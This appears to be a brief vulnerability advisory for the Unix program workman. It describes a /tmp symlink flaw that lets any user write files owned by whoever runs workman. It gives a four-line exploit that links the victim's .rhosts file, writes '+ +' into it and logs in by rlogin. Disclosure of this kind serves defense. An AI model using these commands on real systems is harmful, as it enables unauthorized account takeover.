-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user